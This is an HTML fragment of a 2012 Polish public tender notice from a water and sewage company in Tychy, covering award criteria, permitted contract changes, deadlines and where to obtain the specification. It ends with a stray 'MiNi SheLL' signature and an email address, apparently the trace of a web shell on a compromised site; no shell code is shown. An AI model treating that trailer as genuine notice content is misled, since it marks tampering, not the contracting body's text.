<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy jest dopuszczalna w następujących przypadkach:
a)	konieczność wprowadzenia zmian do umowy w następstwie siły wyższej tj. zdarzenia zewnętrznego, niemożliwego do przewidzenia m.in. katastrofa naturalna, katastrofalne działania przyrody np. ulewne opady deszczu, nadzwyczajne, ponadnormatywne opady śniegu, niezwykłe mrozy, strajk, zamieszki uliczne, pożar, powódź, eksplozja, atak terrorystyczny,
b)	jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,      
c)	jeżeli w okresie obowiązywania umowy nastąpi zmiana stawki podatku od towarów i usług (VAT), dla faktur wystawionych po zmianie stawki podatku, podatek VAT będzie obliczony w obowiązującej stawce, bez konieczności zmiany umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rcgw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalne Centrum Gospodarki Wodno-Ściekowej S.A. 
Al. Marszałka Piłsudskiego 12, 43-100 Tychy
pokój 414 sekretariat IV piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.02.2012 godzina 10:00, miejsce: Regionalnego Centrum Gospodarki Wodno-Ściekowej S.A. w Tychach przy Al. Marszałka Piłsudskiego 12, pokój nr 414-Sekretariat, IV piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów oraz zawarcia umowy ramowej. Zamówienie nie dotyczy finansowania projektu/programu ze środków Unii Europejskiej. Data zamieszczenia niniejszego ogłoszenia w Biuletynie Zamówień Publicznych 26.01.2012.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com